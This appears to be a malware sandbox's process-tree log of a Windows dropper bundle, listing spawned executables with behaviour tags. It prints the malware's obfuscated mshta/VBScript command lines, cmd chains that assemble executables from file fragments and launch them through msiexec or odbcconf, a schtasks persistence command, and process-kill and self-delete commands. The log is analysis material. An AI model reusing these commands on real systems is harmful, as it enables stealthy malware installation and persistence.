PID:7272
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Sx_qmYIYsHqBp_wj3Ln1MfV8.exe"C:\Users\Admin\Pictures\Adobe Films\Sx_qmYIYsHqBp_wj3Ln1MfV8.exe"6⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1372
-
-
C:\Users\Admin\Pictures\Adobe Films\j3hNOCmgC1rOdbV8nYKt7Uvh.exe"C:\Users\Admin\Pictures\Adobe Films\j3hNOCmgC1rOdbV8nYKt7Uvh.exe"6⤵PID:5704
-
-
C:\Users\Admin\Pictures\Adobe Films\R9cTY4VEPHOuD_Od9HLE7RKs.exe"C:\Users\Admin\Pictures\Adobe Films\R9cTY4VEPHOuD_Od9HLE7RKs.exe"6⤵PID:5692
-
-
C:\Users\Admin\Pictures\Adobe Films\GS_rdP5EzIIp19vjksQldrip.exe"C:\Users\Admin\Pictures\Adobe Films\GS_rdP5EzIIp19vjksQldrip.exe"6⤵PID:4944
-
C:\Users\Admin\AppData\Local\Temp\is-DDB38.tmp\GS_rdP5EzIIp19vjksQldrip.tmp"C:\Users\Admin\AppData\Local\Temp\is-DDB38.tmp\GS_rdP5EzIIp19vjksQldrip.tmp" /SL5="$8014C,142095,58368,C:\Users\Admin\Pictures\Adobe Films\GS_rdP5EzIIp19vjksQldrip.exe"7⤵
- Loads dropped DLL
PID:6000 -
C:\Users\Admin\AppData\Local\Temp\is-FUVCA.tmp\((((_________456.exe"C:\Users\Admin\AppData\Local\Temp\is-FUVCA.tmp\((((_________456.exe" /S /UID=27098⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:6868 -
C:\Users\Admin\AppData\Local\Temp\37-b3e8e-d0f-54693-1f1313a3a5c94\Wicimuluby.exe"C:\Users\Admin\AppData\Local\Temp\37-b3e8e-d0f-54693-1f1313a3a5c94\Wicimuluby.exe"9⤵
- Checks computer location settings
- Loads dropped DLL
PID:5632
-
-
C:\Users\Admin\AppData\Local\Temp\11-aefb6-c3d-8b183-97d0d2e697608\Kasaqixawa.exe"C:\Users\Admin\AppData\Local\Temp\11-aefb6-c3d-8b183-97d0d2e697608\Kasaqixawa.exe"9⤵
- Checks whether UAC is enabled
PID:5852
-
-
C:\Program Files\Common Files\FPETCQQQGO\foldershare.exe"C:\Program Files\Common Files\FPETCQQQGO\foldershare.exe" /VERYSILENT9⤵
- Checks whether UAC is enabled
PID:6136
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\tBN4mz42ueVDGnq3iKsMJXj1.exe"C:\Users\Admin\Pictures\Adobe Films\tBN4mz42ueVDGnq3iKsMJXj1.exe"6⤵PID:3524
-
C:\Users\Admin\Pictures\Adobe Films\tBN4mz42ueVDGnq3iKsMJXj1.exe"C:\Users\Admin\Pictures\Adobe Films\tBN4mz42ueVDGnq3iKsMJXj1.exe"7⤵PID:4936
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 7208⤵
- Program crash
PID:6996
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 8247⤵
- Program crash
PID:6568
-
-
-
C:\Users\Admin\Pictures\Adobe Films\UVdN9y_4QPj7aa3ieuKVs0vJ.exe"C:\Users\Admin\Pictures\Adobe Films\UVdN9y_4QPj7aa3ieuKVs0vJ.exe"6⤵PID:1872
-
-
C:\Users\Admin\Pictures\Adobe Films\nPxXYSk4D3g_Te137KmG0MuG.exe"C:\Users\Admin\Pictures\Adobe Films\nPxXYSk4D3g_Te137KmG0MuG.exe"6⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4908
-
-
C:\Users\Admin\Pictures\Adobe Films\wpM_zvlL_cVVxMp5uxffSY1H.exe"C:\Users\Admin\Pictures\Adobe Films\wpM_zvlL_cVVxMp5uxffSY1H.exe"6⤵
- Checks whether UAC is enabled
PID:1364 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScrIPt: cloSE (cREateoBJeCT( "wsCriPT.ShELl").rUn ( "C:\Windows\system32\cmd.exe /q /R tyPE ""C:\Users\Admin\Pictures\Adobe Films\wpM_zvlL_cVVxMp5uxffSY1H.exe"" >OO~~L.EXe && stArt OO~~L.EXe /pPjPGJptW_~SKzEzDIcpQmqTlbw & IF """"== """" for %Q IN ( ""C:\Users\Admin\Pictures\Adobe Films\wpM_zvlL_cVVxMp5uxffSY1H.exe"" ) do taskkill /f -IM ""%~NXQ"" " , 0 , True ) )7⤵PID:5052
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /R tyPE "C:\Users\Admin\Pictures\Adobe Films\wpM_zvlL_cVVxMp5uxffSY1H.exe" >OO~~L.EXe && stArt OO~~L.EXe /pPjPGJptW_~SKzEzDIcpQmqTlbw & IF ""=="" for %Q IN ( "C:\Users\Admin\Pictures\Adobe Films\wpM_zvlL_cVVxMp5uxffSY1H.exe" ) do taskkill /f -IM "%~NXQ"8⤵PID:1240
-
C:\Users\Admin\AppData\Local\Temp\OO~~L.EXeOO~~L.EXe /pPjPGJptW_~SKzEzDIcpQmqTlbw9⤵
- Checks whether UAC is enabled
PID:6464 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScrIPt: cloSE (cREateoBJeCT( "wsCriPT.ShELl").rUn ( "C:\Windows\system32\cmd.exe /q /R tyPE ""C:\Users\Admin\AppData\Local\Temp\OO~~L.EXe"" >OO~~L.EXe && stArt OO~~L.EXe /pPjPGJptW_~SKzEzDIcpQmqTlbw & IF ""/pPjPGJptW_~SKzEzDIcpQmqTlbw ""== """" for %Q IN ( ""C:\Users\Admin\AppData\Local\Temp\OO~~L.EXe"" ) do taskkill /f -IM ""%~NXQ"" " , 0 , True ) )10⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
PID:7124 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /R tyPE "C:\Users\Admin\AppData\Local\Temp\OO~~L.EXe" >OO~~L.EXe && stArt OO~~L.EXe /pPjPGJptW_~SKzEzDIcpQmqTlbw & IF "/pPjPGJptW_~SKzEzDIcpQmqTlbw "=="" for %Q IN ( "C:\Users\Admin\AppData\Local\Temp\OO~~L.EXe" ) do taskkill /f -IM "%~NXQ"11⤵PID:6188
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscrIpT:CLosE ( creAteobJect( "wsCrIPt.Shell" ). Run ( "cMD.eXe /C EchO | Set /p = ""MZ"" >76G0.lSN & CoPY /y /b 76G0.LSN + PdlGFK.Jm + uYpSK.eVi + Dn3ORHj.P_h + 5QkEjQH.M + eREnh.zX J7WZl2.Bu6 & stART msiexec.exe /Y .\J7wZl2.BU6 " , 0 ,TRUe) )10⤵
- Checks whether UAC is enabled
PID:6880 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C EchO | Set /p = "MZ" >76G0.lSN & CoPY /y /b 76G0.LSN + PdlGFK.Jm + uYpSK.eVi +Dn3ORHj.P_h+ 5QkEjQH.M + eREnh.zX J7WZl2.Bu6 & stART msiexec.exe /Y .\J7wZl2.BU611⤵PID:6028
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EchO "12⤵PID:6472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>76G0.lSN"12⤵PID:6200
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /Y .\J7wZl2.BU612⤵PID:5632
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -IM "wpM_zvlL_cVVxMp5uxffSY1H.exe"9⤵
- Kills process with taskkill
PID:6632
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\rKwIbNFR9mEqVRBJA_4RLNYd.exe"C:\Users\Admin\Pictures\Adobe Films\rKwIbNFR9mEqVRBJA_4RLNYd.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:5900
-
-
C:\Users\Admin\Pictures\Adobe Films\MRfygeJgIyPQ1iDpapsWoRM5.exe"C:\Users\Admin\Pictures\Adobe Films\MRfygeJgIyPQ1iDpapsWoRM5.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4640
-
-
C:\Users\Admin\Pictures\Adobe Films\rNd9n4JL8_pkhOmu7cmlkdQr.exe"C:\Users\Admin\Pictures\Adobe Films\rNd9n4JL8_pkhOmu7cmlkdQr.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:5628
-
-
C:\Users\Admin\Pictures\Adobe Films\YQ0mq7JK8CEL08dCPT0wGFk8.exe"C:\Users\Admin\Pictures\Adobe Films\YQ0mq7JK8CEL08dCPT0wGFk8.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4768
-
-
C:\Users\Admin\Pictures\Adobe Films\W5ruVtcGjxrDEg7klVZWOLkf.exe"C:\Users\Admin\Pictures\Adobe Films\W5ruVtcGjxrDEg7klVZWOLkf.exe"6⤵PID:952
-
-
C:\Users\Admin\Pictures\Adobe Films\ie71hT9pqInJOii1Rn0NpwwN.exe"C:\Users\Admin\Pictures\Adobe Films\ie71hT9pqInJOii1Rn0NpwwN.exe"6⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2248
-
-
C:\Users\Admin\Pictures\Adobe Films\YGDQUnC8iHysOziRVO3zVG9C.exe"C:\Users\Admin\Pictures\Adobe Films\YGDQUnC8iHysOziRVO3zVG9C.exe"6⤵PID:6240
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri20be0777551040f32.exe4⤵PID:4596
-
C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri20be0777551040f32.exeFri20be0777551040f32.exe5⤵
- Executes dropped EXE
PID:3616 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscriPT: closE ( CReAteoBjEcT("wScRIpT.ShEll" ). RUn ( "C:\Windows\system32\cmd.exe /q /c coPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri20be0777551040f32.exe"" dSaU40W5.ExE && sTarT DsaU40W5.exE /pvkJlKE4Jas7gQ & iF """" == """" for %s IN (""C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri20be0777551040f32.exe"" ) do taskkill -IM ""%~nXs"" /F " , 0 ,trUe ) )6⤵
- Checks whether UAC is enabled
PID:3276 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /c coPY /Y "C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri20be0777551040f32.exe" dSaU40W5.ExE&&sTarT DsaU40W5.exE /pvkJlKE4Jas7gQ & iF "" == "" for %s IN ("C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri20be0777551040f32.exe" ) do taskkill -IM "%~nXs" /F7⤵PID:1252
-
C:\Users\Admin\AppData\Local\Temp\dSaU40W5.ExEDsaU40W5.exE /pvkJlKE4Jas7gQ8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4252 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscriPT: closE ( CReAteoBjEcT("wScRIpT.ShEll" ). RUn ( "C:\Windows\system32\cmd.exe /q /c coPY /Y ""C:\Users\Admin\AppData\Local\Temp\dSaU40W5.ExE"" dSaU40W5.ExE && sTarT DsaU40W5.exE /pvkJlKE4Jas7gQ & iF ""/pvkJlKE4Jas7gQ "" == """" for %s IN (""C:\Users\Admin\AppData\Local\Temp\dSaU40W5.ExE"" ) do taskkill -IM ""%~nXs"" /F " , 0 ,trUe ) )9⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
PID:4352 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /c coPY /Y "C:\Users\Admin\AppData\Local\Temp\dSaU40W5.ExE" dSaU40W5.ExE&&sTarT DsaU40W5.exE /pvkJlKE4Jas7gQ & iF "/pvkJlKE4Jas7gQ " == "" for %s IN ("C:\Users\Admin\AppData\Local\Temp\dSaU40W5.ExE" ) do taskkill -IM "%~nXs" /F10⤵PID:688
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIpt: cLOSe (cREatEOBJecT( "WscripT.SHeLL"). Run ("cMd.eXe /Q /C echo | seT /P = ""MZ"" > VjcFAPpO.Q4 & copY /y /b VJcFAppO.Q4 + YQIFB2E1.V0E + oEMR_.C~2 +AgL~7F.X+mfEBT.JK + S9TpcxeR.11P FCBUT_S.vQ & STarT odbcconf.exe /A { Regsvr .\FcbUT_S.VQ } ", 0 ,TruE ) )9⤵
- Checks whether UAC is enabled
PID:1632 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C echo | seT /P = "MZ" > VjcFAPpO.Q4& copY /y /b VJcFAppO.Q4+ YQIFB2E1.V0E+oEMR_.C~2 +AgL~7F.X+mfEBT.JK +S9TpcxeR.11P FCBUT_S.vQ& STarT odbcconf.exe /A {Regsvr .\FcbUT_S.VQ }10⤵PID:1388
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo "11⤵PID:1176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>VjcFAPpO.Q4"11⤵PID:2368
-
-
C:\Windows\SysWOW64\odbcconf.exeodbcconf.exe /A {Regsvr .\FcbUT_S.VQ }11⤵
- Loads dropped DLL
PID:4108
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "Fri20be0777551040f32.exe" /F8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4848
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri2058e26838.exe4⤵PID:3208
-
C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri2058e26838.exeFri2058e26838.exe5⤵
- Executes dropped EXE
PID:1272 -
C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri2058e26838.exe"C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri2058e26838.exe"6⤵
- Modifies data under HKEY_USERS
PID:4404
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri20dd1f5f1511478e4.exe4⤵PID:4044
-
C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri20dd1f5f1511478e4.exeFri20dd1f5f1511478e4.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2580 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
PID:3668 -
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"7⤵
- Executes dropped EXE
PID:4920
-
-
C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"7⤵
- Executes dropped EXE
- Modifies system certificate store
PID:3056
-
-
C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"7⤵
- Executes dropped EXE
PID:3672 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Worldoffer.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe" & del C:\ProgramData\*.dll & exit8⤵PID:3896
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Worldoffer.exe /f9⤵
- Kills process with taskkill
PID:2364
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
PID:360
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵PID:2844
-
-
C:\Users\Admin\AppData\Local\Temp\chrome update.exe"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"7⤵
- Executes dropped EXE
PID:1620
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:2064 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵
- Checks whether UAC is enabled
PID:1572 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"9⤵PID:904
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi10⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4396 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )11⤵
- Checks whether UAC is enabled
PID:1152 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"12⤵PID:3080
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )11⤵
- Checks whether UAC is enabled
PID:5756 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC12⤵PID:6024
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "13⤵PID:6120
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"13⤵PID:3284
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC13⤵
- Loads dropped DLL
PID:7064
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"10⤵
- Kills process with taskkill
PID:2080
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:3108 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:504
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
- Executes dropped EXE
PID:2844
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
PID:5248
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\liangzhang-game.exe"C:\Users\Admin\AppData\Local\Temp\liangzhang-game.exe"7⤵
- Executes dropped EXE
PID:2120
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2108
-
-
C:\Users\Admin\AppData\Local\Temp\chrome1.exe"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"7⤵
- Executes dropped EXE
PID:720
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"7⤵
- Executes dropped EXE
PID:3392
-
-
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"7⤵
- Executes dropped EXE
PID:1176
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵
- Executes dropped EXE
PID:1452 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵PID:5652
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:1380
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
- Creates scheduled task(s)
PID:7888
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:1980
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe10⤵PID:7440
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵PID:7872
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri2060e5abb4.exe4⤵PID:3596
-
C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri2060e5abb4.exeFri2060e5abb4.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4392
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6992
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:6844
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:5580
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:6816
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:6372
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\6f619cd9f60945978c8b6aa2481019fb /t 3308 /p 55801⤵PID:3596
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5552
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:7008
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4884
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:2440
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4304
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:1460
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4296
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:7108
-
C:\Users\Admin\AppData\Local\Temp\100B.exeC:\Users\Admin\AppData\Local\Temp\100B.exe1⤵PID:6964
-
C:\Users\Admin\AppData\Local\Temp\100B.exeC:\Users\Admin\AppData\Local\Temp\100B.exe2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5028
-
-
C:\Users\Admin\AppData\Local\Temp\2171.exeC:\Users\Admin\AppData\Local\Temp\2171.exe1⤵
- Drops startup file
PID:6768 -
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"2⤵
- Suspicious behavior: AddClipboardFormatListener
PID:5504
-
-
C:\Users\Admin\AppData\Local\Temp\251B.exeC:\Users\Admin\AppData\Local\Temp\251B.exe1⤵PID:6224
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\tjfzjabk\2⤵PID:5856
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\lqpndjsh.exe" C:\Windows\SysWOW64\tjfzjabk\2⤵PID:1008
-
-
